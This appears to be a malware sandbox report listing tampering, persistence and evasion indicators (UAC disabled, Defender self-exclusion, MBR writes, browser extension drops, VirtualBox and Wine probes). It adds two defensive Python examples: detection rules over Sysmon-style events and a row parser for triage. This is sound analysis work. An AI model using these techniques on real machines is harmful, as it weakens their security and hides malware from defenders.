Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A
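The UAC bypass, Windows security bypass, bcdedit, Drops startup file, Windows security modification and Checks whether UAC is enabled tables above record four host-side actions that are cheap to detect in endpoint telemetry: EnableLUA written to 0, a Defender exclusion added by a process that is not Defender, autostart files dropped into a user's Startup folder, and bcdedit.exe launched from a user-writable location. The following block is an added example written for this page, not part of the sandbox report or of any vendor product: it expresses those four rows as detection rules over Sysmon-style events (EventID 1, 11 and 13 with the Image, ParentImage, TargetObject and Details fields) and runs them over events constructed from the report's own indicators. The DEFENDER_EXCLUSION_WRITERS allow-list and the user-writable-parent check for bcdedit are assumptions to tune per environment; the report does not record which process launched bcdedit.exe, so that event's parent is a placeholder.

```python
"""Detection rules for the tampering and persistence rows of this report, run over
constructed Sysmon-style events (EID 1 ProcessCreate, 11 FileCreate, 13 RegistrySetValue).
Events are built from the report's indicators; they are not captured telemetry."""
import re
from dataclasses import dataclass


@dataclass
class SysmonEvent:
    event_id: int
    image: str                 # Image: process performing the action
    target: str = ""           # TargetObject (EID 13) or TargetFilename (EID 11)
    details: str = ""          # Details (EID 13), e.g. "DWORD (0x00000000)"
    parent_image: str = ""     # ParentImage (EID 1)


# Assumption: processes allowed to write Defender exclusions; add your own management agent.
DEFENDER_EXCLUSION_WRITERS = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\svchost.exe",
}
STARTUP_DIR = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\[^\\]+$", re.I)
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata|pictures|downloads|desktop|documents)|windows\\temp|programdata)\\", re.I)
AUTOSTART_EXT = (".bat", ".cmd", ".lnk", ".exe", ".vbs", ".js", ".ps1")


def uac_disabled(ev: SysmonEvent) -> bool:
    """EnableLUA set to 0 by a direct registry write (report: file300un.exe)."""
    return (ev.event_id == 13
            and ev.target.lower().endswith(r"\microsoft\windows\currentversion\policies\system\enablelua")
            and ev.details.strip().lower() == "dword (0x00000000)")


def defender_exclusion_added(ev: SysmonEvent) -> bool:
    """Value written under Windows Defender\\Exclusions\\* by a process not on the allow-list."""
    return (ev.event_id == 13
            and "\\windows defender\\exclusions\\" in ev.target.lower()
            and ev.image.lower() not in DEFENDER_EXCLUSION_WRITERS)


def defender_self_exclusion(ev: SysmonEvent) -> bool:
    """Strongest form: the excluded path is the writer's own image (exactly the file300un.exe row)."""
    return defender_exclusion_added(ev) and ev.target.lower().endswith(ev.image.lower())


def startup_folder_drop(ev: SysmonEvent) -> bool:
    """Autostart file created in a user's Startup folder (report: .bat files, Task Manager.lnk)."""
    return (ev.event_id == 11
            and STARTUP_DIR.search(ev.target) is not None
            and ev.target.lower().endswith(AUTOSTART_EXT))


def bcdedit_user_writable_parent(ev: SysmonEvent) -> bool:
    """bcdedit.exe started by a parent living in a user-writable path (assumed check)."""
    return (ev.event_id == 1
            and ev.image.lower().endswith(r"\bcdedit.exe")
            and USER_WRITABLE.match(ev.parent_image) is not None)


RULES = {
    "uac_disabled": uac_disabled,
    "defender_exclusion_added": defender_exclusion_added,
    "defender_self_exclusion": defender_self_exclusion,
    "startup_folder_drop": startup_folder_drop,
    "bcdedit_user_writable_parent": bcdedit_user_writable_parent,
}


def run_rules(events):
    """Return (rule_name, image, target) for every rule that matches an event."""
    return [(name, ev.image, ev.target) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed events mirroring rows of this report, plus two benign controls at the end.
F300 = r"C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
STARTUP = r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
SAMPLE_EVENTS = [
    SysmonEvent(13, F300, r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
                "DWORD (0x00000000)"),
    SysmonEvent(13, F300, r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" + "\\" + F300,
                "DWORD (0x00000000)"),
    SysmonEvent(11, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe",
                STARTUP + r"\SJl7XFiiozcizRe9rOsbUIlM.bat"),
    SysmonEvent(11, r"C:\Users\Admin\Pictures\H0UVbMblodCc40gmvFoORgyt.exe", STARTUP + r"\Task Manager.lnk"),
    # Placeholder parent: the report does not record which process launched bcdedit.exe.
    SysmonEvent(1, r"C:\Windows\system32\bcdedit.exe",
                parent_image=r"C:\Users\Admin\AppData\Local\Temp\placeholder_parent.exe"),
    SysmonEvent(13, r"C:\Program Files\Windows Defender\MsMpEng.exe",
                r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Corp\Tools", "DWORD (0x00000000)"),
    SysmonEvent(11, r"C:\Windows\explorer.exe", r"C:\Users\Admin\Desktop\notes.txt"),
]

if __name__ == "__main__":
    for hit in run_rules(SAMPLE_EVENTS):
        print(*hit)
```

Run stand-alone, the block reports six hits: one each for the EnableLUA write, the exclusion write, the self-exclusion and the bcdedit launch, and two Startup-folder drops; the MsMpEng.exe exclusion write and the Explorer file create are left alone. The self-exclusion rule is the one worth the highest severity, since a legitimate exclusion is rarely the path of the process that sets it.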

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\s: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\w: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\z: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\e: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\k: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\r: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\o: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\q: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\t: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\u: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\y: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\f: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\m: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\n: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened (read-only) \??\h: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\j: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\v: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\p: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\x: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\g: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\i: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened (read-only) \??\l: C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A
N/A iplogger.com N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
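The Drops file in Drivers directory, Sets service image path, Registers COM server for autorun, Checks for any installed AV software and Writes to the Master Boot Record tables above are dominated by 360 Total Security components, while the VirtualBox ACPI, BIOS and Wine tables show which processes run the anti-analysis probes. The block below is an added example written for this page, not tooling from the sandbox vendor: it parses the flattened "Description Indicator Process Target" rows in the form this report uses, attributes each row to the component that produced it (360 Total Security, a Windows binary acting as host, a dropped payload, or no process recorded), and builds a per-process profile of the three registry probes. The sample rows are copied from this report; the attribution classes and the vocabulary of row descriptions are this example's own assumptions.

```python
"""Parser and attribution helper for the flattened 'Description Indicator Process Target'
rows used in this report. Answers two responder questions: which signature rows come from
the bundled 360 Total Security package rather than the payloads, and which processes
performed the anti-analysis registry probes."""
import re
from collections import Counter, defaultdict

# Row descriptions seen in this report, longest first so "Key value queried" beats "Key queried".
DESCRIPTIONS = sorted([
    "File opened for modification", "File opened (read-only)", "File created",
    "Key value queried", "Key created", "Key opened", "Key queried",
    "Set value (int)", "Set value (str)", "Destination IP", "N/A",
], key=len, reverse=True)

# The process column is the last field that begins with a drive path after a space; indicators
# embedding a path do so after a backslash or an escaped quote, never after a space.
PROCESS_SPLIT = re.compile(r" (?=[A-Za-z]:\\)")
# One or more backslashes: registry data in the report is rendered with escaped ("\\") separators.
AV_PATH = re.compile(r"\\+360\\+total security\\+|\\360ts_setup\.exe$", re.I)
PROBES = {
    "virtualbox_acpi": re.compile(r"\\acpi\\dsdt\\vbox__$", re.I),
    "bios_version": re.compile(r"\\hardware\\description\\system\\(system|video)biosversion$", re.I),
    "wine_key": re.compile(r"\\software\\wine$", re.I),
}


def parse_row(row: str) -> dict:
    """Split one report row into description, indicator, process and target."""
    row = row.strip()
    desc = next((d for d in DESCRIPTIONS if row.startswith(d + " ")), None)
    if desc is None:
        raise ValueError(f"unrecognised description: {row!r}")
    rest, _, target = row[len(desc):].strip().rpartition(" ")   # target is the last token
    parts = PROCESS_SPLIT.split(rest)
    if len(parts) > 1:
        indicator, process = " ".join(parts[:-1]), parts[-1]
    else:                                   # no process path, e.g. network rows
        indicator, _, process = rest.rpartition(" ")
    return {"description": desc, "indicator": indicator, "process": process, "target": target}


def classify(row: dict) -> str:
    """Attribute a row to the component that produced it (assumed classes)."""
    proc, ind = row["process"], row["indicator"]
    if AV_PATH.search(proc) or AV_PATH.search(ind):
        return "360 Total Security"
    if proc == "N/A":
        return "no process recorded"
    low = proc.lower()
    if low.startswith("c:\\windows\\") and not low.startswith("c:\\windows\\temp\\"):
        return "Windows binary"            # LOLBin or injection host: check what launched it
    return "dropped payload"


def attribute(report: dict) -> dict:
    """signature name -> {attribution class: row count}."""
    return {sig: dict(Counter(classify(parse_row(r)) for r in rows)) for sig, rows in report.items()}


def anti_analysis_profile(rows) -> dict:
    """process -> set of probe kinds it performed, from Key opened / Key value queried rows."""
    profile = defaultdict(set)
    for row in map(parse_row, rows):
        if row["description"] in ("Key opened", "Key value queried"):
            for kind, pattern in PROBES.items():
                if pattern.search(row["indicator"]):
                    profile[row["process"]].add(kind)
    return dict(profile)


# Rows copied from this report (a subset), keyed by signature name.
SAMPLE = {
    "UAC bypass": [
        r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A'],
    "Sets service image path in registry": [
        r'Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHProtected\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\WscReg.exe\"" C:\Program Files (x86)\1717037821_0\360TS_Setup.exe N/A'],
    "Registers COM server for autorun": [
        r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" C:\Windows\system32\regsvr32.exe N/A'],
    "Writes to the Master Boot Record (MBR)": [
        r'File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A',
        r'File opened for modification \??\PhysicalDrive0 C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A',
        r'File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\jfwLrbtuGmt3WgBnEjEXTdp4.exe N/A'],
    "Modifies boot configuration data using bcdedit": [r'N/A N/A C:\Windows\system32\bcdedit.exe N/A'],
    "Unexpected DNS network traffic destination": [r'Destination IP 54.76.137.217 N/A N/A'],
}
PROBE_ROWS = [
    r'Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A',
    r'Key opened \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A',
]

if __name__ == "__main__":
    for sig, counts in attribute(SAMPLE).items():
        print(f"{sig}: {counts}")
    for proc, kinds in anti_analysis_profile(PROBE_ROWS).items():
        print(f"{proc}: {sorted(kinds)}")
```

On the sample rows the MBR signature attributes as two rows from 360 Total Security and one from the dropped payload in Pictures, the service and COM rows attribute entirely to 360 Total Security (the COM row through its indicator, since the writing process is regsvr32.exe), and axplont.exe is the only process in the probe rows that performs all three anti-analysis checks. Feeding the full tables through the same functions gives the triage view the report itself does not offer: per signature, how many rows are installer noise and how many need follow-up.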

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\360WD\wdch.dat-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\360WD\wdch.dat C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zSB59F.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\testwrite.ini C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\filemon\wcachedb.db C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\filemon\wcachedb.db-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\1717037821_0\360TS_Setup.exe C:\Users\Admin\Pictures\360TS_Setup.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\Log\PopWndTrackerLog\pop.log C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\netconfig.dat C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\360\Total Security\safemon\netconfig.dat C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\routertp.ini C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\yxGEQFa.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\filelog.db-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\360\Total Security\filemon\wcachedb.db.flg C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\360\Total Security\modules\360evtmgr.tmp C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\sJDXIlv.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg-journal C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification C:\Program Files (x86)\1717037821_0\360TS_Setup.exe C:\Users\Admin\Pictures\360TS_Setup.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\testwrite.ini C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\SoftMgr\SoftMgr.db C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files (x86)\360\Total Security\modules\360evtmgrpb.dat C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\tegRANPZONsU2\EfeJCiL.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\SoftMgr\SoftMgr.db-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\nFLFFjqrQPUn\kBxrCDq.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg-journal C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\iwJsGcj.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\netconf.dat C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File created C:\Program Files (x86)\360\Total Security\leakrepair.dat C:\Program Files (x86)\360\Total Security\PatchUp.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\deepscan\speedmem2.hg-journal C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\netmon\360netmon.ini C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File created C:\Program Files (x86)\JipyTrDkU\boZYqC.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\tegRANPZONsU2\jbsoPZGYNqnCa.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\EgMaDPs.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\ORjTvDm.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\routertp.ini C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe N/A
File opened for modification C:\Program Files (x86)\360\Total Security\safemon\filelog.db C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe N/A
